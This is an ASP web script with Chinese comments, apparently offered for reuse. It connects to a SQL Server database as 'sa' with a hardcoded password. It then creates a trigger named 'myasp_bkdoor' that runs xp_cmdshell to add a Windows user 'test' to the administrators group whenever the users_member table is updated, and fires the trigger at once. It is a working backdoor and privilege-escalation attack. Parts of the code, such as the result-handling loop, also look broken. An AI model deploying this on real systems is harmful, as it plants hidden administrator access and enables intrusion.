<%
'里邊的變量代碼大家用時自己改吧
On Error Resume next
Set conn=Server.CreateObject("ADODB.Connection")
DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"
conn.Open DSN
if conn.State=1 then
response.write("成功")
sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13)&"ON users_member"&Chr(10)&Chr(13)&"AFTER UPDATE"&Chr(10)&Chr(13)&"AS"&Chr(10)&Chr(13)&"IF user='dbo' OR user='sa'"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'dbo OR sa logon'"&Chr(10)&Chr(13)&"EXEC master..xp_cmdshell'net user test 123456 /add&&net localgroup administrators test /add'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)&"ELSE"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'not dbo or sa privilage'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13) '建立myasp_bkdoor觸發(fā)器，觸發(fā)baby庫中的users_member表的update操作加用戶
SQL1="update users_member set email=3 where accountid=1" '觸發(fā)
'sql2="drop TRIGGER myasp_bkdoor"
set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)'&conn.execute(SQL2) '觸發(fā)
Do Until Rs.EOF
Response.Write " <tr>" & vbNewLine
For I = 0 To Rs.Fields.Count - 1
Response.Write "<td>" & SQLOut(oRs(I)) & "</td>" & vbNewLine
Next
Response.Write " </tr>" & vbNewLine
Rs.MoveNext
Loop
else
response.write("失敗")
end if
%>